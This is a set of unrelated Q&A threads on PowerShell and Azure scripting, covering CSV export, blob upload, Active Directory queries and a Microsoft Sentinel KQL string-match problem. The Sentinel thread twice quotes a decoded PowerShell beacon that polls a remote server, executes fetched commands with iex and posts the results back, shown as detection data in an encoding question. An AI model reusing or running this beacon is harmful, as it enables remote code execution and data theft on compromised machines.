Unable to export Rest API output to CSV via Azure Powershell RunBook - azure-powershell

I am trying to export VMs list from Azure Update management using Azure Rest API. Below is my code.
$url = "https://management.azure.com/subscriptions/$($SubscriptionId)/resourceGroups/$($resourceGroup)/providers/Microsoft.Automation/automationAccounts/$($automationAccount)/softwareUpdateConfigurations/$($UpdateScheduleName)?api-version=" + $apiversion
$RestMethod = (Invoke-RestMethod -Uri $url -Headers $headerParams -Method Get)
$NonAzComputerList = ($RestMethod).Properties.updateConfiguration.nonAzureComputerNames
Write-Output $NonAzComputerList
$NonAzComputerList | Export-Csv "VMList.csv" -NoTypeInformation
On Console, I do get the output correctly with VM names, but in CSV file, I get some random numbers instead of VM names.
I tried convertfrom-json as well but it shows error as "convertfrom-json : Invalid JSON primitive".
The GetType shows System.Object[]
In Console, I am getting correct VM names.
In CSV file, I am getting numbers (equal to number of characters in VM names).

Ok figured it out. Used out-file instead of export-csv


MS Sentinel KQL - Unable to perform string match on decoded base 64 data [duplicate]

I'm having difficulty searching a field for a value in KQL.
The field I am searching I get by decoding a base64 encoded string using the built in function base64_decode_tostring(). The string I am decoding is:
This String decodes to what I expect in the decodedString Column:
$s='';$i='68079a0b-3690321d-1668dc61';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/68079a0b -Headers #{"X-92d9-ab61"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/3690321d -Headers #{"X-92d9-ab61"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/1668dc61 -Method POST -Headers #{"X-92d9-ab61"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}
It can be seen here in the results table:
When I try and use a | where decodedString contains "X-92d9-ab61" clause to detect the string value in the decodedString, Sentinel says there are no results. However I can clearly see this string in my decodedString column above.
In fact, the where clause won't detect anything, unless it is a single character included in the decodedString column.
Why will it only detect single characters? Why will it not detect more than a one character string?
ADX (Azure Data Explorer) aka Kusto, is the service used as a database for Azure Sentinel.
As the ADX documentation states "Internally, strings are encoded in UTF-8".
According to the phenomena you described, and the string you supplied ("AGUAcgBzACAAQAB7ACIAWAAtADkAMgBkADkALQBhAG") it seems that your original data is of a different encoding, most likely UTF-16BE, therefore after ingestion you see your text as characters separated by the null character.
Something like this:
The recommended solution would be to convert your data to UTF-8 before ingesting it to Azure Sentinel.
If the string is constructed only from ASCII characters, we can get a valid, searchable UTF-8 string by removing the NULL characters.
print translate("\0", "", base64_decode_tostring(str))
$s='';$i='68079a0b-3690321d-1668dc61';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/68079a0b -Headers #{"X-92d9-ab61"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/3690321d -Headers #{"X-92d9-ab61"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/1668dc61 -Method POST -Headers #{"X-92d9-ab61"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}

Powershell to upload text string to blob through Azure Automation account

There is no local machine to store a intermittent file. Read data from Blob to string variable, after modification of text string, need to upload the content to destination azure blob through azure automation account using powershell. Everything need to be done in Azure automation account.
Read data from Blob to string variable
If it is the big blob, then Output the blob content to a stream else Output the blob content as string.
$StorageAccount = Get-AzureRmStorageAccount -ResourceGroupName $ResourceGroupName -Name $StorageAccountName
$Blob = Get-AzureStorageBlob -Context $StorageAccount.Context -Container $container -Blob $Filename
$Text = $blob.ICloudBlob.DownloadText()
Write-Output $Text
To get the contents of the blob as a string and pipe it to convertfrom-json directly:
$blobs | Get-AzureStorageBlobContent -AsString | ConvertFrom-Json ...
There are different download options available for Text, Byte, File and Stream in ($Blob.ICloudBlob | Get-Member | where {$_.Name -like "Download*"} | select Name) gives you:
After modification of blob content, for uploading the modified content to the destination blob with the help of Azure Automation and PowerShell commands, please refer the below references will helps you for the following above:
Provision Azure Storage account, automatic file upload using PowerShell
Upload Files to Azure Blob Storage using Power Automate Desktop

Checking availability of a large amount of applications in Microsoft store

My goal is to check for around 800 tools whether they are available in the Microsoft Store or not. Is there a way to query the tools available in the Microsoft Store via API or something similar?
I am grateful for any suggestions. Thank you
I recommend to use a scripting language like PowerShell or BASH or pick your favorite to automate your 800 queries of the Microsoft Store web interface with the respective query at the following URI in the PowerShell example:
$region = 'en-us' # Variable to represent your region.
$keywords = 'Hello+World' # Tool name here, keywords separated by plus
$query = 'https://www.microsoft.com/{0}/search/explore?q={1}' -f $region,
$response = Invoke-WebRequest -Uri $query
# Parse the response HTML, e.g. $response.Links | Out-Gridview

VB.net and powershell variables

I have a Visual Studio form running with VB.net and I'm collecting info needed to setup an AD user. In the end, this info will need to simply be passed to Powershell with no return info needed. Before that though, I need it to check if a printer code has already been assigned to someone before allowing it to be submitted to another user. I have a simple powershell script written up for it.
(We use the Pager field to store the printer code.)
Import-Module ActiveDirectory
$Page = $args[0]
Get-ADUser -Filter { Pager -like $Page } | FT Name
I setup the code I found HERE, and attempted to modify it to my script but it keeps crashing on
Dim results As Collection(Of PSObject) = MyPipeline.Invoke()
It gives me: An unhandled exception of type 'System.Management.Automation.ParseException' occurred in System.Management.Automation.dll
If I run his little 6+5 basic example script, it works, but when I try to retrieve info and return a name, it doesn't like it. How can I get it to return the name of the person if it find it? And since it won't run, I'm not even sure if passing the printer code as $args[0] is going to work yet.
Your results is expecting a collection of PowerShell objects. When you pipe the Get-ADUser command to Format-Table, it effectively strips the object down to a stream of strings. Try without the | FT Name.
Import-Module ActiveDirectory #if you're using powershell 3 or later, this may be redundant
# $Page = $args[0] # don't need to do this
$results = Get-ADUser -Filter { Pager -like $args[0] }
Write-Verbose $results
#Write-Verbose $results.Name #try this if the above one works
Write-Verbose may be causing an issue.
Try this:
Get-ADUser -Filter { Pager -like $args[0] }
Just that one line as the total PS code. (Assuming you have PowerShell 3.0 or later, you don't need Import-Module) That line will return objects of type TypeName: Microsoft.ActiveDirectory.Management.ADUser (from `Get-ADUser username | Get-Member).
You may also be able to use the .Net object type directly, without PowerShell. I'm not knowledgeable about .NET beyond what I picked up working with PowerShell.
Accessing AD using .NET, info from MSDN.

How to use SQL Server agent to run a Powershell command to generate a CSV file?

I have a PowerShell command like this:
Search-ADAccount -AccountDisabled -UsersOnly | FT Name
> C:\Users\hou\Downloads\DisabledAccount.csv
This command can grab all disabled account names from AD and put it into a .CSV file.
I want to set up a job in SQL Server agent so it will run the command whenever I need it.
But the Agent keep gives me error when I was trying to run the job.
Can anyone let me know the right command for this while running in SQL Server agent?
You might have other issues but the glaring first one you have is you do not have a CSV file. If you opened the file you would see that it is not following any CSV standard but that of a formatted table.
Search-ADAccount -AccountDisabled -UsersOnly |
Export-CSV -notypeinformation C:\Users\hou\Downloads\DisabledAccount.csv
Format-Table is just for showing information on the screen. Not for use of generating output. If you want to make a CSV then that is what Export-CSV is there to do. If you only wanted the name column then you could add a Select-Object in the pipe.
Search-ADAccount -AccountDisabled -UsersOnly |
Select-Object Name |
Export-CSV -notypeinformation C:\Users\hou\Downloads\DisabledAccount.csv